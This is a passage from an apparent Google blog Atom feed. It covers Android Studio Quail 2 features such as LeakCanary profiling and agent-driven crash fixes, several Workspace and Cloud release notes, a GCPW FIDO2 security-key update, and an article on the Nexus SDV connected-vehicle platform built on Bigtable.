&lt;p style="text-align: center;"&gt;&lt;i&gt;Run multiple agent tasks in parallel with different models of your choice.&lt;/i&gt;&lt;/p&gt;&lt;p style="text-align: center;"&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwUDucsd939pAvvfRC8VvmNkDp-1nDBMaP3TGFwdjspFgPz7_CVS-7NVzNhP278oKO3MNJL0RZy3k9aCZgmVtuqsahIZh79bGXhB026yKqPPiMYVMFkkSUgTBSLLajNObkMkke_iF6i_cIMRRQ_5Zl8zLgXWKYItToSiyLaZfok-pd-KVkAkRfup_yCsI/s3456/Screenshot%202026-06-17%20at%2012.56.57%E2%80%AFAM.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwUDucsd939pAvvfRC8VvmNkDp-1nDBMaP3TGFwdjspFgPz7_CVS-7NVzNhP278oKO3MNJL0RZy3k9aCZgmVtuqsahIZh79bGXhB026yKqPPiMYVMFkkSUgTBSLLajNObkMkke_iF6i_cIMRRQ_5Zl8zLgXWKYItToSiyLaZfok-pd-KVkAkRfup_yCsI/s1600/Screenshot%202026-06-17%20at%2012.56.57%E2%80%AFAM.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="text-align: left;"&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;Use the History icon to navigate between active tasks.&lt;/i&gt;&lt;/div&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;

&lt;h2 style="margin-top: 12px;"&gt;Memory leak detection with LeakCanary&lt;/h2&gt;

&lt;p&gt;Memory leaks in Android occur when your code holds onto an object's reference long after its life cycle has ended. This prevents the Garbage Collector from reclaiming that memory, eventually leading to sluggish performance or &lt;code&gt;OutOfMemoryError&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Hunting down memory leaks can be a tedious, manual task. Starting with Android Studio Quail 2, the popular open-source leak detector &lt;a href="https://square.github.io/leakcanary/"&gt;LeakCanary&lt;/a&gt; is natively integrated directly into the Profiler as a dedicated, first-class task.&lt;/p&gt;

&lt;p&gt;This integration transforms your debugging performance by lifting and shifting the heap analysis off your resource-constrained testing phone, and onto your powerful development computer. By running the analysis on your computer, leak tracing is up to five times faster and jank-free, leaving your test app running smoothly on the device.&lt;/p&gt;

&lt;p&gt;Once a leak is detected during a profiling session:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;The Profiler renders an interactive, color-coded leak trace, grouping occurrences and estimating lost memory.&lt;/li&gt;
  &lt;li&gt;You can click &lt;b&gt;Go to declaration&lt;/b&gt; on any leaking object in the trace to instantly jump to that exact line of code in your editor.&lt;/li&gt;
  &lt;li&gt;You can click &lt;b&gt;Fix with Agent&lt;/b&gt; to have the Gemini agent ingest the trace, explain the root cause of the retained reference, and write the exact code change (such as unbinding a listener or clearing a static reference) to plug the leak.&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwBONeahZYC_5KBtkgQkc5vTjzmN5D-ypyOOScCRcp6Cy8CZeNHVWeNViBS6D_we7HaRy_AjIg1tptZAVEqNTeQ4IVVjoQp4_XJp45648fhiD0H5qvNmiPphikYGDNbEyus-QTVkSU9imwJm4QN0CKnWFs6JZsVkC21SXl9LXAnSndereOvE6iDWOmsEo/s1250/Leak_Canary_4e3675ccb2_ZXI2sE.webp" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwBONeahZYC_5KBtkgQkc5vTjzmN5D-ypyOOScCRcp6Cy8CZeNHVWeNViBS6D_we7HaRy_AjIg1tptZAVEqNTeQ4IVVjoQp4_XJp45648fhiD0H5qvNmiPphikYGDNbEyus-QTVkSU9imwJm4QN0CKnWFs6JZsVkC21SXl9LXAnSndereOvE6iDWOmsEo/s1600/Leak_Canary_4e3675ccb2_ZXI2sE.webp" /&gt;&lt;/a&gt;&lt;span style="text-align: left;"&gt;&lt;i&gt;Review memory leaks identified via LeakCanary through the Fix with Agent button.&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;

&lt;h2 style="margin-top: 12px;"&gt;App Quality Insights agent integration&lt;/h2&gt;

&lt;p&gt;Tracking down the root cause of an app crash can require manually synthesizing stack traces, device data, and source code. However Android Studio’s App Quality Insights (AQI) is now fully integrated with Agent Mode to do the heavy lifting for you.&lt;/p&gt;

&lt;p&gt;When you click on a crash in the AQI panel, you immediately get a concise, high-level summary of the issue. If you need to dig deeper, simply click &lt;b&gt;See more&lt;/b&gt;. This opens a dedicated chat where the agent uses your selected model and pulls in local source code and the full stack trace to deliver a comprehensive explanation of the failure.&lt;/p&gt;

&lt;p&gt;With the new agent integration, you move directly from issue identification to resolution. By clicking &lt;b&gt;Fix with AI&lt;/b&gt;, the agent will analyze the issue, propose a step-by-step fix plan, and—upon your approval—apply the necessary code changes directly to your project and verify the resulting fix&lt;/p&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;
  
&lt;/div&gt;&lt;p style="text-align: center;"&gt;&lt;i&gt;The &lt;b&gt;Fix with AI&lt;/b&gt; button triggering the agent to analyze the issue, then propose the fix&lt;/i&gt;&lt;/p&gt;

&lt;h2 style="margin-top: 12px;"&gt;Quality &amp;amp; stability improvements&lt;/h2&gt;

&lt;p&gt;Beyond new features, we’ve continued our focus on quality by addressing numerous bugs and incorporating the latest stability and performance improvements from the IntelliJ platform, making this a significant enhancement for your daily development.&lt;/p&gt;

&lt;h2 style="margin-top: 12px;"&gt;Get Started&lt;/h2&gt;

&lt;p&gt;Ready to dive in and accelerate your development? &lt;a href="https://developer.android.com/studio"&gt;Download&lt;/a&gt; Android Studio Quail 2 and start exploring these new features today! As always, your feedback is crucial to us. &lt;a href="https://developer.android.com/studio/known-issues"&gt;Check known issues&lt;/a&gt;, &lt;a href="https://developer.android.com/studio/report-bugs"&gt;report bugs&lt;/a&gt;, and be part of our vibrant community on &lt;a href="https://www.linkedin.com/showcase/androiddev/posts/?feedView=all"&gt;LinkedIn&lt;/a&gt;, &lt;a href="https://medium.com/androiddevelopers"&gt;Medium&lt;/a&gt;, &lt;a href="https://www.youtube.com/c/AndroidDevelopers/videos"&gt;YouTube&lt;/a&gt;, or &lt;a href="https://twitter.com/androidstudio"&gt;X&lt;/a&gt;.&amp;nbsp;&lt;/p&gt;</content>
    <link href="https://android-developers.googleblog.com/2026/06/android-studio-quail-2-stable-features.html" rel="alternate"/>
    <category term="Android Developers"/>
    <published>2026-07-14T11:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://developers.google.com/workspace/release-notes#July_14_2026</id>
    <title>Workspace Release Notes — July 14, 2026</title>
    <updated>2026-07-14T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Google Calendar API&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Generally Available:&lt;/strong&gt; You can now filter calendar list entries to show only calendars belonging to your organization using the new &lt;code&gt;showOwnOrganizationOnly&lt;/code&gt; parameter in the &lt;code&gt;calendarList.list&lt;/code&gt; endpoint.&lt;/p&gt;
&lt;p&gt;To learn more, see the &lt;a href="https://developers.google.com/workspace/calendar/api/v3/reference/calendarList/list"&gt;&lt;code&gt;calendarList.list&lt;/code&gt; documentation&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://developers.google.com/workspace/release-notes#July_14_2026" rel="alternate"/>
    <category term="Workspace Release Notes"/>
    <published>2026-07-14T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://developers.google.com/workspace/calendar/docs/release-notes#July_14_2026</id>
    <title>Calendar API — July 14, 2026</title>
    <updated>2026-07-14T07:00:00+00:00</updated>
    <content type="html">&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Generally Available:&lt;/strong&gt; You can now filter calendar list entries to show only calendars belonging to your organization using the new &lt;code&gt;showOwnOrganizationOnly&lt;/code&gt; parameter in the &lt;code&gt;calendarList.list&lt;/code&gt; endpoint.&lt;/p&gt;
&lt;p&gt;To learn more, see the &lt;a href="https://developers.google.com/workspace/calendar/api/v3/reference/calendarList/list"&gt;&lt;code&gt;calendarList.list&lt;/code&gt; documentation&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://developers.google.com/workspace/calendar/docs/release-notes#July_14_2026" rel="alternate"/>
    <category term="Calendar API"/>
    <published>2026-07-14T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_14_2026</id>
    <title>Cloud Release Notes — July 14, 2026</title>
    <updated>2026-07-14T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Cloud Tasks&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;Cloud Tasks is available in the following &lt;a href="https://docs.cloud.google.com/tasks/docs/locations"&gt;locations&lt;/a&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;me-central1&lt;/code&gt; (Doha, Qatar)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;me-central2&lt;/code&gt; (Dammam, Saudi Arabia)&lt;/li&gt;
&lt;/ul&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_14_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-14T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/chrome/were-expanding-gemini-in-chrome-to-users-in-the-uk</id>
    <title>We’re expanding Gemini in Chrome to users in the U.K.</title>
    <updated>2026-07-14T07:00:00+00:00</updated>
    <content type="html">Example of Chrome Partner Multi Tab featuring Jet2</content>
    <link href="https://blog.google/products-and-platforms/products/chrome/were-expanding-gemini-in-chrome-to-users-in-the-uk" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-14T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/products/gemini-app/gemini-southeast-asia-report-2026</id>
    <title>How Gemini is speaking the language of Southeast Asia</title>
    <updated>2026-07-14T04:30:00+00:00</updated>
    <content type="html">A dotted colorful background, spark, text "Hi Southeast Asia, how can I help?", and a search query "The Gemini Report | Southeast Asia 2026"</content>
    <link href="https://blog.google/innovation-and-ai/products/gemini-app/gemini-southeast-asia-report-2026" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-14T04:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/07/google-credential-provider-for-windows-now-supports-FIDO2-compliant-physical-security-keys-as-a-second-factor-for-authentication.html</id>
    <title>Google Credential Provider for Windows (GCPW) now supports FIDO2-compliant physical security keys as a second factor for authentication</title>
    <updated>2026-07-13T17:45:43+00:00</updated>
    <content type="html">&lt;p&gt;Google Credential Provider for Windows (GCPW) has been updated to support FIDO2-compliant physical security keys as a second factor for authentication. This update helps organizations improve their security posture by enabling administrators to enforce 2-Step Verification (2SV) using hardware security keys at the Windows login screen. Additionally, users can now use passkeys from nearby Bluetooth-connected mobile devices for their second-factor authentication.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjR0zeCemaxqTCVO6rOV0FfMasB3e_Wsd4bVZFuQ_by6qzf6oOCWwxQ8fUHEm71h0NeQP4mlwRqqUyxhpNQ9LtePYgVFxN7FnPPoIyl7yf1GV_njZK1ExTx6odDrgn0quaJ432YywTJULkIbvAOLvg-78iXl5jY1Ve5OCFngVfggpWpcN-w3KlFQJRy6A0/s1025/Google%20Credential%20Provider%20for%20Windows%20(GCPW)%20now%20supports%20FIDO2-compliant%20physical%20security%20keys%20as%20a%20second%20factor%20for%20authentication%20-%206959.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjR0zeCemaxqTCVO6rOV0FfMasB3e_Wsd4bVZFuQ_by6qzf6oOCWwxQ8fUHEm71h0NeQP4mlwRqqUyxhpNQ9LtePYgVFxN7FnPPoIyl7yf1GV_njZK1ExTx6odDrgn0quaJ432YywTJULkIbvAOLvg-78iXl5jY1Ve5OCFngVfggpWpcN-w3KlFQJRy6A0/s1600/Google%20Credential%20Provider%20for%20Windows%20(GCPW)%20now%20supports%20FIDO2-compliant%20physical%20security%20keys%20as%20a%20second%20factor%20for%20authentication%20-%206959.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; Visit the Help Center to &lt;a href="https://knowledge.workspace.google.com/admin/security/deploy-2-step-verification?hl=en&amp;amp;visit_id=639184417936026454-2171514902&amp;amp;rd=1#step_5_enforce_2-step_verification_optional" target="_blank"&gt;learn more about enforcing 2SV&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; There is no end user setting for this feature.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Gradual rollout (up to 15 days for feature visibility)&amp;nbsp; starting on July 13, 2026&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/9543613" target="_blank"&gt;Prepare to install GCPW&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/07/google-credential-provider-for-windows-now-supports-FIDO2-compliant-physical-security-keys-as-a-second-factor-for-authentication.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-13T17:45:43+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/databases/nexus-sdv-uses-bigtable-android-automotive-for-agentic-vehicles</id>
    <title>Building the AI-defined vehicle with Android, Google Cloud, and Nexus SDV</title>
    <updated>2026-07-13T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The automotive industry is moving from building hardware-centric platforms toward building their own sophisticated Software-Defined Vehicle (SDV) architectures. For OEMs, a vehicle is no longer just a way to go from point A to point B, but an intelligent, connected node within an AI-native ecosystem! &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With its partners, Google’s Android and Google Cloud are at the forefront of this transition. Android’s open source &lt;/span&gt;&lt;a href="https://source.android.com/docs/automotive" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Automotive OS (AAOS) SDV&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; implements the AI-defined vehicle while  Google Cloud provides scalable infrastructure including a full suite of AI integration tools, leveraging services like Bigtable for automotive and manufacturing telematics at scale. Valtech, a Google Cloud partner, uses Google technologies as part of its &lt;/span&gt;&lt;a href="https://www.valtech.com/industries/mobility/nexus-sdv-platform/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Nexus SDV platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, establishing a full end-to-end connected vehicle system that enables truly agentic mobility, offering automotive OEMs a ready-to-use, end-to-end foundation for the next generation of connected vehicles. Let’s take a look at how this all comes together.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The vehicle side: AAOS SDV&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As the foundational in-vehicle platform, Google’s open source &lt;/span&gt;&lt;a href="https://blog.google/products-and-platforms/platforms/android/android-automotive-os/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AAOS SDV platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; abstracts core functions into reusable services independent of physical hardware, establishing a modular Service-Oriented Architecture (SOA). By decoupling non-safety domains like climate control, lighting, and diagnostics from Electronic Control Units (ECUs), the AAOS SDV platform introduces dynamic runtime service discovery. With this, the SDV can easily discover what services are running (e.g., the odometer, HVAC, sunroof, motorized seats, electric windows, etc.) and their status.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To accelerate development, engineering teams leverage the &lt;/span&gt;&lt;a href="https://source.android.com/docs/devices/cuttlefish" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Android Cuttlefish emulator&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to build digital twins in the cloud, simulating high-frequency sensor streams to validate these decoupled services bit-for-bit before physical silicon is ready. Valtech Nexus SDV utilizes this AAOS SDV middleware layer to discover, map, and manage vehicle resources, structuring and streaming high-frequency telemetry data straight into Bigtable. Compare this to the prior state of affairs, where OEMs outsourced system software to a variety of suppliers, each with their own pipelines, protocols, and data stored in separate silos. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Crucially, this model decouples services from the heavy main infotainment stack, so they can run independently, even when the vehicle is off and parked. This allows functions like remote vehicle monitoring to remain active even when the primary infotainment system is powered down, ensuring continuous telemetry access without draining the vehicle’s 12V battery or main EV battery pack.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This tight integration between the AAOS SDV platform and Nexus SDV enables a number of agentic AI and innovative first-party solutions. Unlike traditional sandboxed infotainment tools, multimodal AI agents can utilize the service discovery layer to safely interact with the physical car and process complex, intent-based requests. For example, an AI agent could automatically adjust climate zones, window actuators, or interior lighting based on a conversation with the driver, or in response to climate sensors, as in this clip: &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/1_Xv8GF4B.gif" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By linking this on-vehicle service layer managed by Nexus SDV with historical fleet telemetry stored in Bigtable, you deliver deeply integrated experiences that unlock new mobility solutions. Now let’s take a quick look at the Cloud side.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;The Google Cloud side: AI-native mobility&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Beyond SDV, we are rapidly moving toward AI-defined vehicles, or AIDV, where AI is core to a vehicle's operational logic. To be AI-native means being autonomous by design, with AI embedded at every architectural level. With this level of AI, the system can perceive environments, reason through complex scenarios using engines like Google Gemini, and proactively execute actions. For example, a Gemini-powered vehicle doesn't just warn you that you’re low on power; it analyzes your schedule, traffic, and charger availability to suggest an optimized charging stop that pre-conditions the battery for maximum efficiency. This is the level of contextual understanding and proactive automation that characterizes AIDV.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Compare this to legacy architectures, which weren’t designed to capture the volume and variety of data coming from different systems across the vehicle. This can lead to data silos of isolated maintenance and safety information telematics. Moreover, because this data is fragmented, it can be very difficult to get cohesive value from the data across systems. An AI-native approach can help collapse these silos, providing a unified contextual understanding. This solves a primary OEM pain point: the massive complexity of managing high-bandwidth telemetry from multiple sources like SDV telematics. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Bigtable: The data backbone for Automotive Telemetry&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/bigtable/docs/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Bigtable&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; was purpose-built for the massive ingestion rates and sub-millisecond latency requirements, and serves as the data backbone for petabyte-scale automotive and manufacturing telemetry datasets. In fact, Bigtable is already being used to support business critical &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/databases/ford-pro-intelligence-built-on-bigtable-nosql-database"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;automotive telemetry solutions&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Its flexible, sparse-row schema allows OEMs to evolve their data models without downtime, accommodating diverse sensor arrays — from high-frequency engine metrics to LiDAR point clouds — within a single, unified table structure. Then, by versioning time-series events in a way that is natively optimized for both massive writes and complex, multi-dimensional analytical lookups, Bigtable helps avoid the data overload typical of legacy systems.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Meanwhile, features like Continuous Materialized Views (CMV) allow for pre-calculating key metrics, such as average battery temperature or fleet-wide torque distributions, directly within the storage layer, minimizing computational overhead. Bigtable’s integration with &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/build/adk"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Development Kit&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (ADK) further bridges the gap between data and action by giving AI agents access to data. This kit combined with Bigtable’s integrations with frameworks like Apache Spark help monitor the "firehose" of live telemetry data and trigger automated workflows in real time, e.g., logging mission-critical alerts, initiating proactive over-the-air (OTA) software adjustments, or pre-ordering replacement parts, the moment specific degradation patterns are detected.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Bring it all together: Nexus-SDV platform&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Nexus SDV platform is built on Google Cloud and integrated with AAOS SDV, supporting the future of connected vehicles. By providing a standardized data foundation, Nexus empowers automotive OEMs to go beyond building infrastructure from scratch and start focusing on unique brand experiences.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Nexus SDV uses Google components like Gemini Enterprise Agent Platform, Bigtable, and BigQuery. Setting up Nexus SDV is quick, automated and transparent. OEMs can create  brand-specific customer experiences in the vehicle, as well as in other customer touch points such as the UI screen, mobile app, or service centers.  The connection to the vehicle is accomplished by leveraging the open source &lt;/span&gt;&lt;a href="https://www.synadia.com/blog/sdv-demo-nats-to-bigtable" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Synadia NATS&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; interface. This integration with the vehicle is facilitated through simple Cloud and vehicle SDKs, for service discovery on both sides. Nexus SDV is optimized for AAOS SDV, but can integrate with any vehicle framework.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_xkFqOEk.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Security is woven into the Nexus architecture via a "Defense-in-Depth" model. Mutual TLS (mTLS) and Google Cloud Certificate Authority Service (CAS) provide vehicles with a cryptographically secure identity. Network isolation is maintained through Private GKE clusters, while the &lt;/span&gt;&lt;a href="https://safety.google/intl/en_in/safety/saif/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Secure AI Framework&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (SAIF) helps ensure data privacy throughout the machine learning lifecycle, protecting sensitive user data and OEM intellectual property.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Together, the quick setup and integration time coupled with a standardized data foundation and built-in state-of-the-art security leads to an immediate and measurable business impact for the car manufacturer.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="3" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/3_plvKwuF.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Let’s put it all together and look at a use case in more detail…&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Predictive maintenance&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By moving from reactive to predictive maintenance, OEMs can reduce warranty costs, improve customer loyalty, and ensure higher vehicle uptime.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The challenge:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Traditional scheduled maintenance is often inefficient, leading to unnecessary service visits or unexpected vehicle breakdowns that incur significant costs for both OEMs and owners. By moving to a proactive, AI-driven approach, Nexus SDV,  Bigtable, and ADK transform this experience. The process begins by taking the firehose of vehicle telemetry data —monitoring engine RPM, vibration, fluid levels, brake pressure, and more — ingesting it and storing it directly into Bigtable.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To enable real-time anomaly detection, agentic AI can monitor telemetry streams as they arrive. Bigtable CMVs pre-calculate rolling aggregations such as average engine vibration or sudden fluctuations in battery temperature profiles. AI models consuming these live aggregates can then detect subtle deviations from normal parameters, identifying early signs of engine wear or accelerated battery degradation long before a warning light appears on the dashboard.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once an anomaly is detected by specialized AI models, the system shifts into the agentic reasoning and action phase. A Gemini-powered engine assesses the severity and context of the data, considering factors like mileage, model, make, service history, and upcoming trips. Based on this intelligent assessment, the system can proactively notify the driver via the AAOS infotainment system, suggests an optimized service appointment at a nearby dealership, or can even trigger an automated parts order to ensure everything is ready upon arrival. The AI model works against false negatives to protect customer sentiment or erosion of confidence, while the solution as a whole ensures higher vehicle uptime, transforming maintenance from a reactive burden into a brand-defining service experience.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The AI-native Nexus SDV platform with AAOS SDV is &lt;/span&gt;&lt;a href="http://github.com/GoogleCloudPlatform/nexus-sdv" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;available today&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, providing a sophisticated, end-to-end connected vehicle ecosystem designed to meet the extreme scale and analytical rigors of modern mobility. By adopting this unified, open-source architecture, OEMs can transcend the limitations of legacy infrastructure and redirect their resources toward the development of high-impact, brand-defining features. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Nexus SDV takes the connected vehicle service into the agentic era, where vehicles are no longer merely connected, but serve as intelligent, proactive partners in the driving experience. Give it a try today.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Learn more&lt;/strong&gt;&lt;/h3&gt;
